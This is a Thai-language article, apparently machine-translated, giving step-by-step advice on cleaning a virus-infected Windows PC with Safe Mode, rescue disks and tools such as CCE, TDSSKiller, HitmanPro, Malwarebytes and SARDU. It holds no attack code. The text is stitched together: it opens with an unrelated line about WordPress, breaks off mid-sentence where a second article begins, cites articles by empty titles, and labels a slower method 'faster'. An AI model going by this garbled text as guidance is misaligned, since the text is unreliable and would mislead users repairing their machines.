ฉันลบไฟล์นี้แล้วและปัญหาได้รับการแก้ไขแล้ว ฉันมีความประทับใจที่ชัดเจนว่า WordPress นั้นเหมือนกับ Windows และ จะทำอย่างไรกับมัน?


ไม่พบคำตอบใช่ไหม ใช้การค้นหาไซต์

ในบทความนี้ เราจะพิจารณาสถานการณ์ที่ข้อความปรากฏบนคอมพิวเตอร์ว่าตรวจพบไวรัส ทำงานช้าหรือมีข้อผิดพลาด และ ผู้ใช้ควรดำเนินการอย่างไรในกรณีนี้ และจะปกป้องข้อมูลไม่ให้สูญหายได้อย่างไร.

ที่จริงแล้ว หากผู้ใช้พบข้อความตรวจจับไวรัส นั่นก็ถือว่าดี ซึ่งหมายความว่าโปรแกรมป้องกันไวรัสตรวจพบไวรัสและมักจะลบไวรัสออกโดยที่ผู้ใช้ไม่ต้องดำเนินการใดๆ

ข้อความนี้ไม่ได้หมายความว่าคอมพิวเตอร์ของคุณติดไวรัส คุณเพียงแค่ดาวน์โหลดหรือคัดลอกไฟล์ที่ติดไวรัสลงในคอมพิวเตอร์ของคุณ และโปรแกรมป้องกันไวรัสมักจะลบมันก่อนที่ปัญหาจะเริ่มปรากฏขึ้น ในทำนองเดียวกัน โปรแกรมป้องกันไวรัสสามารถรายงานการตรวจพบหน้าอินเทอร์เน็ตที่ติดไวรัส และการใช้งานต่อไปอาจทำให้เกิดปัญหากับคอมพิวเตอร์ได้

กล่าวอีกนัยหนึ่ง ข้อความที่ตรวจพบไวรัสเมื่อใช้คอมพิวเตอร์อย่างถูกต้องไม่ได้หมายความว่าติดไวรัสหรือเสียหายแล้ว ซึ่งหมายความว่าคุณไม่ควรใช้เพจหรือไฟล์ที่ติดไวรัส ระบบจะเตือนคุณถึงปัญหาที่อาจเกิดขึ้นหากคุณใช้งาน

คุณยังสามารถไปที่โปรแกรมป้องกันไวรัสของคุณและตรวจสอบบันทึกการกักกันหรือการตรวจจับไวรัสเพื่อดูข้อมูลโดยละเอียดเพิ่มเติมเกี่ยวกับไวรัสและการดำเนินการใดบ้างที่นำไปใช้กับไวรัส


หากคุณไม่ได้ใช้โปรแกรมป้องกันไวรัสบนคอมพิวเตอร์ของคุณ

หากคุณไม่ได้ใช้โปรแกรมป้องกันไวรัสบนคอมพิวเตอร์ของคุณและคอมพิวเตอร์เริ่มทำงานช้าหรือมีข้อผิดพลาด แสดงว่ามีโอกาสสูงที่จะติดไวรัส นอกจากนี้ สถานการณ์นี้อาจเกิดขึ้นได้หากคุณใช้โปรแกรมป้องกันไวรัสกับฐานข้อมูลป้องกันไวรัสที่ล้าสมัย

หากคุณไม่มีโปรแกรมป้องกันไวรัสติดตั้งอยู่ในคอมพิวเตอร์ คุณจะต้องติดตั้งโดยเร็วที่สุด แน่นอนว่ามีโปรแกรมป้องกันไวรัสฟรีคุณภาพสูงไม่มากนัก คุณสามารถพิจารณาหนึ่งในนั้นที่ Microsoft ให้มา - Microsoft Security Essentials โปรแกรมป้องกันไวรัสนี้จะปกป้องและทำความสะอาดคอมพิวเตอร์ของคุณจากไวรัส


แต่โปรดจำไว้ว่าการใช้โปรแกรมนี้จะเกี่ยวข้องกับ Windows เวอร์ชันสูงสุด 7 เท่านั้น (รวมอยู่ด้วย) เริ่มต้นด้วย Windows 8 ระบบปฏิบัติการได้จัดเตรียมโปรแกรมป้องกันไวรัส Windows Defender ในตัวไว้แล้วซึ่งติดตั้งและพร้อมใช้งานแล้ว

หากโปรแกรมป้องกันไวรัสของคุณตรวจไม่พบไวรัส

หากมีการติดตั้งซอฟต์แวร์ป้องกันไวรัสบนคอมพิวเตอร์ของคุณ แต่คุณสงสัยว่ามีไวรัส ให้ลองติดตั้งโปรแกรมป้องกันไวรัสอื่นและสแกนคอมพิวเตอร์ของคุณด้วยโปรแกรมดังกล่าว

นักพัฒนาซอฟต์แวร์บางรายเสนอโปรแกรมป้องกันไวรัสแบบทดลองใช้งานหรือแม้แต่เวอร์ชันออนไลน์ การใช้โปรแกรมดังกล่าวทำให้คุณสามารถสแกนหาไวรัสในคอมพิวเตอร์ของคุณได้ฟรี


กรณีการติดเชื้อคอมพิวเตอร์ที่ซับซ้อนมากขึ้น

ไวรัสบางชนิดและมัลแวร์ประเภทอื่นๆ เจาะเข้าไปในระบบได้ลึกมากจนการลบออกกลายเป็นปัญหาเลยทีเดียว โดยเฉพาะโปรแกรมป้องกันไวรัสที่ติดตั้งหลังจากคอมพิวเตอร์ติดไวรัส เนื่องจากไวรัสมีเวลาเพียงพอที่จะเพิ่มจำนวนและดาวน์โหลดมัลแวร์เพิ่มเติม

ในกรณีนี้ คุณไม่สามารถทำได้โดยไม่ต้องบูตเข้าสู่ Safe Mode เมื่อ Windows บู๊ตเข้าสู่ Safe Mode ระบบจะไม่โหลดแอปพลิเคชันบุคคลที่สาม (ซึ่งรวมถึงไวรัสด้วย) วิธีนี้ทำให้คุณสามารถรันโปรแกรมป้องกันไวรัสได้โดยไม่มีการรบกวนจากไวรัส

หากต้องการบูตเข้าสู่ Safe Mode ให้รีสตาร์ทคอมพิวเตอร์โดยกดปุ่ม Shift ค้างไว้ เรียกใช้โปรแกรมป้องกันไวรัสหลังจากบูตคอมพิวเตอร์ใน Safe Mode แล้วรีสตาร์ทอีกครั้งหลังจากนั้น

หากการทำความสะอาดคอมพิวเตอร์ของคุณจากไวรัสจาก Safe Mode ไม่ทำงาน คุณสามารถลองใช้ "Antivirus Rescue Disk" ซึ่งใช้ในการสแกนและรักษาคอมพิวเตอร์ที่ติดไวรัสซึ่งไม่สามารถรักษาให้หายขาดได้โดยใช้โปรแกรมป้องกันไวรัสที่ทำงานภายใต้ระบบปฏิบัติการ เมื่อดาวน์โหลด "Antivirus Rescue Disk" โปรแกรมป้องกันไวรัสจะได้รับพื้นที่ว่างเพื่อทำงานกับคอมพิวเตอร์และกำจัดไวรัสซึ่งในกรณีนี้จะไม่ได้ใช้งาน

ตามกฎแล้ว บริษัทขนาดใหญ่ที่พัฒนาซอฟต์แวร์ป้องกันไวรัสจะมี "Antivirus Rescue Disk" อยู่ในผลิตภัณฑ์ของตน

หากซอฟต์แวร์ที่เป็นอันตรายสร้างความเสียหายให้กับระบบอย่างมากจนหลังจากลบไวรัสแล้ว Windows ไม่สามารถบู๊ตหรือทำงานต่อไปได้อย่างไม่ถูกต้อง คุณสามารถลองรีเซ็ตเป็นการตั้งค่าจากโรงงานหรือทำการติดตั้งระบบปฏิบัติการใหม่ทั้งหมด

แต่โปรดจำไว้ว่าการทำเช่นนี้บนคอมพิวเตอร์จะ

การใช้เคล็ดลับ "วิธีทำความสะอาดคอมพิวเตอร์ที่ติดไวรัส" ที่ให้ไว้ในบทความนี้ คุณสามารถลบมัลแวร์ประเภทใดก็ได้ออกจากคอมพิวเตอร์ของคุณและกลับสู่สภาพการทำงาน

1. ตรวจสอบให้แน่ใจว่าคอมพิวเตอร์ของคุณติดไวรัสจริงๆ

ก่อนที่คุณจะพยายามลบการติดไวรัสออกจากคอมพิวเตอร์ของคุณ คุณต้องแน่ใจว่าคอมพิวเตอร์นั้นติดไวรัสจริงๆ หากต้องการทำสิ่งนี้ โปรดดูคำแนะนำที่ฉันให้ไว้ในบทความ "" หากสิ่งนี้บ่งชี้ว่าคอมพิวเตอร์ของคุณติดไวรัส ให้ทำตามขั้นตอนในส่วนถัดไป ตรวจสอบให้แน่ใจว่าคุณทำตามลำดับที่ถูกต้อง

2. วิธีทำความสะอาดคอมพิวเตอร์ของคุณและตรวจสอบให้แน่ใจว่าสะอาดจริงๆ

โปรดทราบว่าผู้ใช้ขั้นสูงสามารถข้ามไปยังส่วนสุดท้ายและทำความสะอาดคอมพิวเตอร์ตามลำดับได้ นี่เป็นแนวทางที่มีประสิทธิผลมากที่สุด แต่ก็เป็นแนวทางหนึ่งที่ใช้เวลานานที่สุดเช่นกัน อย่างไรก็ตาม หากจำเป็น คุณสามารถตรงไปที่ส่วนนั้นแล้วกลับไปที่จุดเริ่มต้นอีกครั้งหากการติดเชื้อยังไม่หายไปทั้งหมด

2.1 การทำความสะอาดคอมพิวเตอร์ของคุณโดยใช้ CCE และ TDSSKiller

ดาวน์โหลด Comodo Cleaning Essentials (CCE) จากหน้านี้ ตรวจสอบให้แน่ใจว่าคุณเลือกเวอร์ชันที่ถูกต้องสำหรับระบบปฏิบัติการของคุณ หากคุณไม่แน่ใจว่าคอมพิวเตอร์ของคุณใช้ระบบปฏิบัติการ 32 บิตหรือ 64 บิต โปรดดู นอกจากนี้ ให้ดาวน์โหลด Kaspersky TDSSKiller จากหน้านี้ หากคุณไม่สามารถดาวน์โหลดโปรแกรมใดๆ เหล่านี้ได้ หรือหากการเชื่อมต่ออินเทอร์เน็ตของคุณใช้งานไม่ได้ คุณจะต้องดาวน์โหลดโดยใช้คอมพิวเตอร์เครื่องอื่นและถ่ายโอนไปยังเครื่องที่ติดไวรัสโดยใช้แฟลชไดรฟ์ ตรวจสอบให้แน่ใจว่าไม่มีไฟล์อื่นในแฟลชไดรฟ์ ระวังอุปกรณ์แฟลชเนื่องจากมัลแวร์สามารถแพร่เชื้อได้เมื่อคุณใส่อุปกรณ์ลงในคอมพิวเตอร์ของคุณ ดังนั้นอย่าเชื่อมต่อกับคอมพิวเตอร์เครื่องอื่นหลังจากถ่ายโอนโปรแกรมเหล่านี้ นอกจากนี้ฉันอยากจะชี้ให้เห็นว่าทั้งสองโปรแกรมสามารถพกพาได้ ซึ่งหมายความว่าเมื่อคุณใช้มันเสร็จแล้ว คุณจะไม่ต้องถอนการติดตั้งมันอีก เพียงลบโฟลเดอร์ของพวกเขาแล้วพวกเขาจะถูกลบ

เมื่อคุณดาวน์โหลด CCE แล้ว ให้แตกไฟล์ เปิดโฟลเดอร์ และดับเบิลคลิกไฟล์ชื่อ "CCE" หน้าต่างหลัก Comodo Cleaning Essentials จะเปิดขึ้น หากไม่เปิดขึ้นมา ให้กดปุ่ม Shift ค้างไว้แล้วดับเบิลคลิกไฟล์ชื่อ "CCE" เมื่อ CCE เปิดสำเร็จแล้ว คุณสามารถปล่อยปุ่ม Shift ได้ อย่างไรก็ตามอย่าปล่อยจนกว่าโปรแกรมจะโหลดเข้าสู่หน่วยความจำโดยสมบูรณ์ หากคุณปล่อยมันอย่างน้อยในระหว่างที่ UAC แจ้ง มันจะไม่สามารถเปิดได้อย่างถูกต้องแม้ว่าจะใช้วิธีการบังคับก็ตาม การกด Shift ค้างไว้จะช่วยให้เปิดได้แม้ในคอมพิวเตอร์ที่ติดไวรัสอย่างหนัก ทำได้โดยระงับกระบวนการที่ไม่จำเป็นมากมายที่อาจขัดขวางไม่ให้ทำงาน หากวิธีนี้ยังไม่ช่วยให้สามารถทำงานได้ ให้ดาวน์โหลดและรันโปรแกรมชื่อ RKill สามารถดาวน์โหลดได้จากหน้านี้ โปรแกรมนี้จะหยุดกระบวนการที่เป็นอันตรายที่ทราบ ดังนั้นเมื่อเปิดตัวแล้ว CCE น่าจะเปิดตัวได้สมบูรณ์แบบ

เมื่อทำงานแล้ว ให้เรียกใช้ Smart Scan ใน CCE และกักกันทุกอย่างที่พบ โปรแกรมนี้ยังค้นหาการเปลี่ยนแปลงระบบที่อาจเกิดจากมัลแวร์ พวกเขาจะปรากฏในผลลัพธ์ ฉันอยากจะแนะนำให้ปล่อยให้โปรแกรมแก้ไขปัญหานี้ด้วย รีสตาร์ทคอมพิวเตอร์เมื่อได้รับแจ้ง หลังจากรีสตาร์ทคอมพิวเตอร์ ให้เปิด Kaspersky TDSSKiller สแกนและกักกันสิ่งที่พบ

นอกจากนี้ หากการเชื่อมต่ออินเทอร์เน็ตของคุณใช้งานไม่ได้ก่อนหน้านี้ ให้ตรวจสอบว่าขณะนี้ใช้งานได้หรือไม่ จำเป็นต้องมีการเชื่อมต่ออินเทอร์เน็ตที่ถูกต้องสำหรับขั้นตอนเพิ่มเติมในส่วนนี้

เมื่อการสแกน CCE เสร็จสิ้น และคุณแน่ใจว่าการเชื่อมต่ออินเทอร์เน็ตใช้งานได้ ให้เปิด CCE อีกครั้ง หวังว่าคราวนี้จะเปิดได้ แต่ถ้าไม่ ให้เปิดโดยกดปุ่ม Shift ค้างไว้ จากนั้นจากเมนู "เครื่องมือ" ใน CCE ให้เปิด KillSwitch ใน KillSwitch ในเมนู "มุมมอง" เลือกตัวเลือก "ซ่อนกระบวนการที่ปลอดภัย" จากนั้นคลิกขวาที่กระบวนการทั้งหมดที่ทำเครื่องหมายว่าน่าสงสัยหรือเป็นอันตรายแล้วเลือกตัวเลือกเพื่อลบออก คุณควรคลิกขวาที่กระบวนการที่ไม่รู้จักที่เหลืออยู่และเลือกตัวเลือก "Kill Process" อย่าลบกระบวนการที่ทำเครื่องหมายเป็น FLS.Unknownจากนั้นใน CCE จากเมนูเครื่องมือ ให้เรียกใช้ Autorun Analyzer และเลือกตัวเลือก "ซ่อนรายการที่ปลอดภัย" จากเมนู "มุมมอง" จากนั้นปิดการใช้งานรายการใดๆ ที่เป็นของไฟล์ที่ถูกทำเครื่องหมายว่าน่าสงสัยหรือเป็นอันตราย คุณสามารถทำได้โดยยกเลิกการทำเครื่องหมายที่ช่องถัดจากรายการต่างๆ คุณควรปิดการใช้งานรายการใด ๆ ที่ทำเครื่องหมายเป็น FLS ไม่ทราบว่าคุณคิดว่าน่าจะเป็นมัลแวร์ ห้ามนำสิ่งของใดๆ ออก

ตอนนี้รีสตาร์ทคอมพิวเตอร์ของคุณ หลังจากรีบูตเครื่อง ให้ตรวจสอบคอมพิวเตอร์ของคุณอีกครั้งโดยใช้คำแนะนำที่ฉันให้ไว้ในบทความ "" หากทุกอย่างดีคุณสามารถไปยังส่วน " " ได้ โปรดจำไว้ว่ารายการรีจิสตรีที่ปิดใช้งานไม่เป็นอันตราย นอกจากนี้ โปรดทราบว่าแม้ว่าคอมพิวเตอร์ของคุณจะปราศจากการติดไวรัส แต่ก็ยังอาจมีมัลแวร์อยู่บ้าง ไม่เป็นอันตราย แต่อย่าแปลกใจหากการสแกนด้วยโปรแกรมอื่นยังคงพบมัลแวร์ในคอมพิวเตอร์ของคุณ สิ่งเหล่านี้คือเศษที่เหลือจากสิ่งที่คุณเพิ่งลบไป หากคุณไม่พอใจกับสิ่งตกค้างเหล่านี้บนคอมพิวเตอร์ของคุณ คุณสามารถลบสิ่งตกค้างส่วนใหญ่ออกได้โดยการสแกนด้วยโปรแกรมที่กล่าวถึงในส่วนถัดไป

อย่างไรก็ตาม หากคอมพิวเตอร์ของคุณยังไม่ได้รับการล้างการติดไวรัส แต่อย่างน้อยหนึ่งโปรแกรมสามารถเริ่มทำงานได้ ให้ทำตามขั้นตอนที่อธิบายไว้ในส่วนนี้อีกครั้ง และดูว่าจะช่วยขจัดการติดไวรัสได้หรือไม่ แต่หากไม่มีโปรแกรมใดที่สามารถเริ่มต้นได้ โปรดดำเนินการในส่วนถัดไป นอกจากนี้ แม้ว่าการทำตามคำแนะนำในส่วนนี้อีกครั้งจะไม่เพียงพอที่จะทำความสะอาดคอมพิวเตอร์ของคุณ แต่คุณก็ยังต้องไปยังส่วนถัดไป

2.2 หากคอมพิวเตอร์ของคุณยังไม่สะอาด ให้สแกนโดยใช้ HitmanPro, Malwarebytes และ Emsisoft Anti-Malware

หากขั้นตอนข้างต้นไม่ได้ช่วยกำจัดการติดเชื้อได้อย่างสมบูรณ์ คุณต้องดาวน์โหลด HitmanPro จากหน้านี้ ติดตั้งโปรแกรมและเรียกใช้ "Default Scan" หากไม่ได้ติดตั้ง ให้ข้ามไปยังย่อหน้าถัดไปแล้วติดตั้ง Malwarebytes เมื่อได้รับแจ้งระหว่างการติดตั้ง HitmanPro ฉันขอแนะนำให้คุณเลือกตัวเลือกเพื่อทำการสแกนคอมพิวเตอร์ของคุณเพียงครั้งเดียวเท่านั้น สิ่งนี้ควรเหมาะกับผู้ใช้ส่วนใหญ่ นอกจากนี้ หากมัลแวร์ป้องกันไม่ให้เปิดอย่างถูกต้อง ให้เปิดโปรแกรมโดยกดปุ่ม CTRL ค้างไว้จนกระทั่งโหลดเข้าสู่หน่วยความจำ กักกันการแพร่กระจายใดๆ ที่เธอพบ โปรดทราบว่าโปรแกรมนี้จะสามารถลบการติดไวรัสได้ภายใน 30 วันหลังการติดตั้งเท่านั้น ในระหว่างการถอนการติดตั้ง คุณจะถูกขอให้เปิดใช้งานใบอนุญาตรุ่นทดลองใช้ของคุณ

เมื่อ HitmanPro ลบการติดไวรัสที่ตรวจพบทั้งหมดแล้ว หรือหาก Hitman Pro ไม่สามารถติดตั้งได้ คุณจะต้องดาวน์โหลด Malwarebytes เวอร์ชันฟรีจากหน้านี้ โปรดทราบว่ามีเทคโนโลยีกิ้งก่า ซึ่งน่าจะช่วยติดตั้งได้แม้ในคอมพิวเตอร์ที่ติดไวรัสอย่างหนัก ฉันแนะนำให้คุณยกเลิกการเลือกช่องทำเครื่องหมาย "เปิดใช้งานการทดลองใช้ Malwarebytes Anti-Malware Pro ฟรี" ตรวจสอบให้แน่ใจว่าโปรแกรมได้รับการอัพเดตอย่างสมบูรณ์แล้วจึงทำการสแกนอย่างรวดเร็ว กักกันการติดเชื้อที่เธอพบ หากมีโปรแกรมใดขอให้คุณรีสตาร์ทคอมพิวเตอร์ อย่าลืมรีสตาร์ทเครื่องด้วย

จากนั้นดาวน์โหลด Emsisoft Emergency Kit จากหน้านี้ เมื่อดาวน์โหลดเสร็จแล้ว ให้แยกเนื้อหาของไฟล์ zip จากนั้นดับเบิลคลิกที่ไฟล์ชื่อ "start" และเปิด "Emergency Kit Scanner" เมื่อได้รับแจ้ง ให้อนุญาตให้โปรแกรมอัพเดตฐานข้อมูล เมื่ออัปเดตแล้ว ให้กลับไปที่เมนูความปลอดภัย จากนั้นไปที่ "ยืนยัน" และเลือก "ด่วน" จากนั้นคลิก "ยืนยัน" เมื่อการสแกนเสร็จสิ้น ให้กักกันรายการที่ตรวจพบทั้งหมด รีสตาร์ทคอมพิวเตอร์ทุกครั้งที่คุณต้องการ

หลังจากสแกนคอมพิวเตอร์ของคุณด้วยโปรแกรมเหล่านี้แล้ว คุณต้องรีสตาร์ทเครื่อง จากนั้นตรวจสอบคอมพิวเตอร์ของคุณอีกครั้งโดยใช้เคล็ดลับที่ฉันให้ไว้ในบทความ "" หากทุกอย่างดีแล้ว คุณสามารถไปยังส่วน " " ได้ โปรดจำไว้ว่ารายการรีจิสตรีที่ปิดใช้งานไม่เป็นอันตราย อย่างไรก็ตาม หากคอมพิวเตอร์ของคุณยังไม่สะอาด ให้ทำตามขั้นตอนในส่วนนี้อีกครั้งและดูว่าสามารถช่วยกำจัดการติดไวรัสได้หรือไม่ หากก่อนหน้านี้โปรแกรมในส่วน 2.1 ไม่สามารถทำงานได้อย่างถูกต้อง คุณควรกลับไปลองเรียกใช้อีกครั้ง หากไม่มีโปรแกรมข้างต้นที่สามารถเริ่มทำงานได้ ให้บูตเข้าสู่ Safe Mode with Networking แล้วลองสแกนจากที่นั่น อย่างไรก็ตาม หากพวกเขาสามารถเริ่มต้นได้อย่างถูกต้องและภัยคุกคามยังคงอยู่แม้ว่าจะทำตามคำแนะนำในส่วนนี้อีกครั้งแล้ว คุณก็สามารถไปยังส่วนถัดไปได้

2.3 หากจำเป็น ให้ลองใช้วิธีที่เร็วกว่านี้

หากมาตรการข้างต้นไม่สามารถกำจัดการติดไวรัสได้อย่างสมบูรณ์ แสดงว่าอาจมีมัลแวร์บางตัวที่ไม่ตอบสนองอย่างมากอยู่ในเครื่องของคุณ ดังนั้นวิธีการที่กล่าวถึงในส่วนนี้จึงมีประสิทธิภาพมากกว่ามาก แต่จะต้องใช้เวลามากกว่านี้ สิ่งแรกที่ฉันแนะนำให้ทำคือสแกนคอมพิวเตอร์ของคุณด้วยเครื่องสแกนต่อต้านรูทคิตตัวอื่นที่เรียกว่า GMER สามารถดาวน์โหลดได้จากหน้านี้ ลบสิ่งที่จะเป็นสีแดงออก อย่าลืมคลิกปุ่มสแกนทันทีหลังจากที่โปรแกรมเสร็จสิ้นการวิเคราะห์ระบบอย่างรวดเร็ว นอกจากนี้ หากคุณใช้ระบบปฏิบัติการ 32 บิต คุณต้องดาวน์โหลดเครื่องสแกนรูทคิท ZeroAccess และเครื่องมือลบ คุณสามารถดูข้อมูลเกี่ยวกับรูทคิทนี้และลิงก์ไปยังโปรแกรมสำหรับลบออกจากระบบ 32 บิตได้ที่นี่ สามารถดาวน์โหลด AntiZeroAccess ได้จากลิงค์ในย่อหน้าที่สอง

หลังจากสแกนในโปรแกรมข้างต้นแล้ว สิ่งต่อไปที่คุณควรทำคือเปิด CCE ไปที่การตั้งค่าและเลือกตัวเลือก “สแกนหาการแก้ไข MBR ที่น่าสงสัย” จากนั้นคลิก "ตกลง" ขณะนี้อยู่ใน CCE ให้ทำการสแกนแบบเต็ม รีบูตเมื่อจำเป็นและกักกันสิ่งที่พบ โปรดทราบว่าตัวเลือกนี้อาจค่อนข้างอันตรายเนื่องจากอาจเผยให้เห็นปัญหาที่ไม่มีเลย ใช้ด้วยความระมัดระวังและตรวจสอบให้แน่ใจว่าทุกสิ่งที่สำคัญได้รับการสำรองข้อมูลแล้ว โปรดทราบว่าในบางกรณีซึ่งเกิดขึ้นไม่บ่อยนัก การสแกนด้วยตัวเลือกเหล่านี้อาจทำให้ระบบไม่สามารถบู๊ตได้ สิ่งนี้เกิดขึ้นไม่บ่อยนัก แต่ถึงแม้จะเกิดขึ้นก็สามารถแก้ไขได้ หากคอมพิวเตอร์ของคุณหยุดเริ่มทำงานหลังจากรันการสแกนนี้ ให้ใช้แผ่นดิสก์การติดตั้ง Windows เพื่อทำการกู้คืนระบบ ซึ่งจะช่วยให้คอมพิวเตอร์ของคุณกลับมาทำงานได้อีกครั้ง

เมื่อ CCE เสร็จสิ้นแล้ว ให้เปิด CCE อีกครั้งโดยกดปุ่ม SHIFT ค้างไว้ การดำเนินการนี้จะยุติกระบวนการที่ไม่จำเป็นส่วนใหญ่ที่อาจขัดขวางไม่ให้คุณสแกน จากนั้นเปิด KillSwitch ไปที่เมนู "มุมมอง" และเลือก "ซ่อนกระบวนการที่ปลอดภัย" ตอนนี้ ลบกระบวนการที่เป็นอันตรายทั้งหมดอีกครั้ง จากนั้นคุณควรคลิกขวาที่กระบวนการที่ไม่รู้จักทั้งหมดที่เหลืออยู่และเลือก "Kill Process" อย่าลบพวกเขาคุณควรปฏิบัติตามคำแนะนำในย่อหน้านี้ทุกครั้งที่คุณรีสตาร์ทคอมพิวเตอร์เพื่อให้แน่ใจว่าการสแกนครั้งถัดไปมีประสิทธิภาพมากที่สุดเท่าที่จะเป็นไปได้

หลังจากเสร็จสิ้นกระบวนการทั้งหมดที่ไม่ถือว่าน่าเชื่อถือแล้ว คุณควรเปิดโปรแกรม HitmanPro ขณะที่กดปุ่ม CTRL ค้างไว้ จากนั้นเรียกใช้ "การสแกนเริ่มต้น" และกักกันทุกสิ่งที่พบ จากนั้นทำการสแกนแบบเต็มใน Malwarebytes และ Emsisoft Emergency Kit กักกันสิ่งที่พวกเขาพบ หลังจากนั้นให้ดาวน์โหลด SUPERAntiSpyware เวอร์ชันฟรีจากหน้านี้ โปรดใช้ความระมัดระวังเป็นอย่างยิ่งระหว่างการติดตั้ง เนื่องจากมีโปรแกรมอื่นๆ รวมอยู่ในตัวติดตั้งด้วย ในหน้าแรก ตรวจสอบให้แน่ใจว่าได้ยกเลิกการเลือกทั้งสองตัวเลือกเกี่ยวกับการติดตั้ง Google Chrome ตอนนี้เลือกตัวเลือก "การติดตั้งแบบกำหนดเอง" ในระหว่างการติดตั้งแบบกำหนดเอง คุณจะต้องยกเลิกการเลือกช่องทำเครื่องหมายสองช่องจากตัวเลือกในการเพิ่ม Google Chrome อีกครั้ง

นอกจากนี้โปรแกรมจะติดตั้งได้สมบูรณ์แบบ เมื่อได้รับแจ้งให้เริ่มทดลองใช้ฟรี ฉันขอแนะนำให้คุณปฏิเสธ เมื่อโปรแกรมโหลดเต็มแล้ว ให้เลือกตัวเลือก Complete Scan แล้วคลิกปุ่ม "Scan your Computer..." จากนั้นคลิกปุ่ม "เริ่มสแกนให้เสร็จสิ้น>" ลบไฟล์ที่ตรวจพบและรีสตาร์ทคอมพิวเตอร์เมื่อจำเป็น

หลังจากทำตามขั้นตอนเหล่านี้แล้ว คุณต้องรีสตาร์ทคอมพิวเตอร์ จากนั้นทดสอบอีกครั้งโดยใช้คำแนะนำที่ฉันให้ไว้ในบทความ "" หากทุกอย่างดีคุณสามารถไปยังส่วน " " ได้ โปรดจำไว้ว่ารายการรีจิสตรีที่ปิดใช้งานไม่เป็นอันตราย อย่างไรก็ตาม หากคอมพิวเตอร์ของคุณยังไม่ได้รับการทำความสะอาด ให้ทำตามขั้นตอนที่อธิบายไว้ในส่วนนี้อีกครั้ง และดูว่าจะช่วยกำจัดการติดไวรัสได้หรือไม่ ถ้าไม่เช่นนั้นคุณจะต้องไปยังส่วนถัดไป

2.4 หากจำเป็น ให้สร้างดิสก์สำหรับบูต

หากวิธีการข้างต้นไม่สามารถกำจัดการติดไวรัสได้อย่างสมบูรณ์ หรือหากคุณไม่สามารถบู๊ตคอมพิวเตอร์ได้ ดังนั้นเพื่อทำความสะอาดคอมพิวเตอร์ของคุณ คุณอาจต้องใช้ซีดีที่สามารถบู๊ตได้ (หรือแฟลชไดรฟ์) หรือที่เรียกว่าดิสก์สำหรับบูต ฉันรู้ว่าทั้งหมดนี้อาจดูเหมือนเป็นงานหนัก แต่จริงๆ แล้วก็ไม่ได้แย่ขนาดนั้น เพียงจำไว้ว่าคุณต้องสร้างดิสก์นี้บนคอมพิวเตอร์ที่ไม่ติดไวรัส มิฉะนั้นไฟล์อาจเสียหายหรือติดไวรัสได้

เนื่องจากนี่คือไดรฟ์สำหรับบูต จึงไม่มีมัลแวร์ใดที่สามารถซ่อน ปิดการใช้งาน หรือรบกวนการทำงานของมันในทางใดทางหนึ่งได้ ดังนั้นการสแกนในโปรแกรมต่างๆ ด้วยวิธีนี้น่าจะทำให้คุณสามารถทำความสะอาดเครื่องได้เกือบทุกเครื่องไม่ว่าเครื่องจะติดไวรัสแค่ไหนก็ตาม ข้อยกเว้นประการเดียวคือหากไฟล์ระบบติดไวรัสในเครื่อง หากเป็นกรณีนี้ การลบการติดไวรัสออกอาจทำให้เกิดอันตรายต่อระบบได้ นี่คือเหตุผลหลักว่าทำไมคุณจึงได้สำรองเอกสารสำคัญทั้งหมดของคุณก่อนที่จะเริ่มกระบวนการทำความสะอาด อย่างไรก็ตาม บางครั้งคุณสามารถแก้ไขปัญหานี้ได้โดยทำตามคำแนะนำที่ฉันให้ไว้ด้านล่าง

เมื่อต้องการทำเช่นนี้ คุณต้องดาวน์โหลด . นี่เป็นโปรแกรมที่ยอดเยี่ยมที่จะช่วยให้คุณสร้างดิสก์ที่สามารถบู๊ตได้แผ่นเดียวพร้อมโปรแกรมป้องกันไวรัสหลายโปรแกรม นอกจากนี้ยังมีคุณสมบัติที่มีประโยชน์อื่นๆ อีกมากมายที่ฉันจะไม่กล่าวถึงในบทความนี้ มีหนังสือเรียนที่มีประโยชน์มากสำหรับ SARDU หลายเล่มอยู่ในหน้านี้ โปรดใช้ความระมัดระวังเป็นอย่างยิ่งเกี่ยวกับข้อเสนอเพิ่มเติมที่รวมอยู่ในโปรแกรมติดตั้ง น่าเสียดายที่ขณะนี้โปรแกรมนี้กำลังพยายามหลอกลวงผู้อื่นให้ติดตั้งโปรแกรมเพิ่มเติมที่ส่วนใหญ่ไม่จำเป็น

หลังจากดาวน์โหลดแล้ว ให้แตกไฟล์และเปิดโฟลเดอร์ SARDU จากนั้นเรียกใช้ไฟล์ปฏิบัติการที่ตรงกับระบบปฏิบัติการของคุณ - ไม่ว่าจะเป็น sardu หรือ sardu_x64 บนแท็บ Antivirus คลิกแอพพลิเคชันป้องกันไวรัสที่คุณต้องการเขียนลงดิสก์ที่คุณกำลังสร้าง คุณสามารถเพิ่มได้มากหรือน้อยตามที่เห็นสมควร ฉันขอแนะนำให้คุณสแกนคอมพิวเตอร์ของคุณด้วย Dr.Web LiveCD, Avira Rescue System และ Kaspersky Rescue Disk เป็นอย่างน้อย หนึ่งในข้อดีเกี่ยวกับ Dr.Web ก็คือบางครั้งมันช่วยให้คุณสามารถแทนที่ไฟล์ที่ติดไวรัสด้วยเวอร์ชันที่สะอาดหมดจด แทนที่จะลบมันออกไป วิธีนี้จะช่วยคุณทำความสะอาดคอมพิวเตอร์บางเครื่องโดยไม่ทำอันตรายต่อระบบ ดังนั้นฉันขอแนะนำอย่างยิ่งให้รวม Dr.Web ไว้ในไดรฟ์สำหรับบูตของคุณด้วย

การคลิกที่ชื่อแอปพลิเคชั่นป้องกันไวรัสต่างๆ มักจะนำคุณไปยังหน้าที่คุณสามารถดาวน์โหลดอิมเมจ ISO ของโปรแกรมป้องกันไวรัสที่เกี่ยวข้องได้ บางครั้งคุณจะได้รับตัวเลือกให้ดาวน์โหลดโดยตรงผ่าน SARDU แทน ซึ่งอยู่ใต้แท็บ Downloader หากได้รับตัวเลือก ให้เลือกตัวเลือกการดาวน์โหลด ISO เสมอ นอกจากนี้ หลังจากดาวน์โหลดไฟล์ ISO แล้ว คุณอาจต้องย้ายไฟล์ไปยังโฟลเดอร์ ISO ที่อยู่ในโฟลเดอร์ SARDU หลัก เมื่อคุณย้ายอิมเมจ ISO ของผลิตภัณฑ์ป้องกันไวรัสทั้งหมดที่คุณต้องการไปยังโฟลเดอร์ ISO คุณก็พร้อมที่จะสร้างดิสก์สำหรับบูตฉุกเฉิน ในการดำเนินการนี้ ให้ไปที่แท็บ Antivirus และตรวจสอบให้แน่ใจว่าได้ตรวจสอบโปรแกรมป้องกันไวรัสทั้งหมดที่คุณเลือกไว้แล้ว 